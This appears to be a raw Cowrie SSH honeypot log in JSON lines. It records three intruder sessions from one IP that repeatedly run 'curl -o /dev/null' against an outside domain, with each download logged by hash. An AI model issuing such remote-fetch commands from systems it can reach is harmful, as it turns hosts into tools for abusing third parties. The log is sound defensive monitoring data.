{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.000960Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.003594Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.006715Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.009080Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.009666Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.011735Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.012414Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.013444Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.013824Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.021905Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.024576Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.050355Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.054431Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.056544Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.060034Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.060700Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.067239Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.068589Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.069122Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.070912Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.071369Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.103067Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.104702Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.107536Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.110211Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.112077Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.112512Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.114346Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.114740Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.124075Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.124788Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.149357Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.150035Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.153394Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.154640Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.158694Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.161501Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.164648Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.166925Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.167952Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.195960Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.196664Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.198394Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.199098Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.203683Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.205739Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.226005Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.229806Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.230449Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.233504Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.235633Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.238129Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.239188Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.239965Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.241365Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.241943Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.269149Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.269880Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.274754Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.276609Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.278139Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.279003Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.301146Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.301930Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.304914Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.305651Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.311323Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.313350Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.315392Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.316615Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.321573Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.347333Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.348109Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.350104Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.350884Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.355401Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
